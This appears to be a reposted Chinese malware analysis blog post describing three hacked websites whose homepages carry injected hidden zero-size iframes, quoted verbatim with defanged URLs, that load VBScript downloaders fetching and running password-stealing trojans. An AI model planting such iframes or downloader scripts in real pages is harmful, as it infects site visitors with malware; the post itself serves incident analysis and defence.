3个网站被挂上的木马出自一家-蒲公英云

3个网站被挂上的木马出自一家

小咪咪 2024-04-20 11:17 154阅读 0赞

endurer　原创

2006-09-18　第1版

第1个网站 首页被加入的的代码：
/———-
＜iframe src=’htxxp://www.***.why***all.com/1’ width=’0’ height=’0’ frameborder=’0’＞＜/iframe＞
-———/

1.htm 内容为加入多余空格的VBScript脚本代码。（瑞星报为： Trojan.DL.VBS.Agent.r，Kaserpsky报为：Trojan-Downloader.JS.Agent.ba）

该脚本代码利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 htxxp://www.***.why***all.com/1/test.exe，保存为 %temp% 中的 test.exe，并利用Shell.Application 对象的 ShellExecute 方法来运行。

test.exe 采用 nSPack 1.3 -> North Star/Liu Xing Ping 加壳，长度为 85,930 字节。Kaserpsky报为：Trojan-PSW.Win32.WOW.iu。

第2个网站 首页被加入的的代码：
/———-
＜iframe src=’htxxp://www.***.why***all.com/2’ width=’0’ height=’0’ frameborder=’0’＞＜/iframe＞
-———/

2.htm 内容为加入多余空格的VBScript脚本代码。（瑞星报为： Trojan.DL.VBS.Agent.r，Kaserpsky报为：Trojan-Downloader.JS.Agent.ba）

该脚本代码利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 htxxp://www.***.why***all.com/2/du.exe，保存为 %temp% 中的 test.exe，并利用Shell.Application 对象的 ShellExecute 方法来运行。

du.exe 采用 nSPack 1.3 -> North Star/Liu Xing Ping 加壳，文件大小为12,286 字节，
Kaserpsky报为：Trojan-Downloader.Win32.Delf.aul，瑞星报为： Trojan.DL.Delf.cwh。

第3个网站 首页被加入的的代码：
/———-
＜iframe src=’htxxp://www.***.why***all.com/3’ width=’0’ height=’0’ frameborder=’0’＞＜/iframe＞
-———/

3.htm 内容为加入多余空格的VBScript脚本代码。（瑞星报为： Trojan.DL.VBS.Agent.r，Kaserpsky报为：Trojan-Downloader.JS.Agent.ba）

该脚本代码利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 htxxp://www.***.why***all.com/3/du.exe，保存为 %temp% 中的 test.exe，并利用Shell.Application 对象的 ShellExecute 方法来运行。

du.exe 与2.htm下载的相同。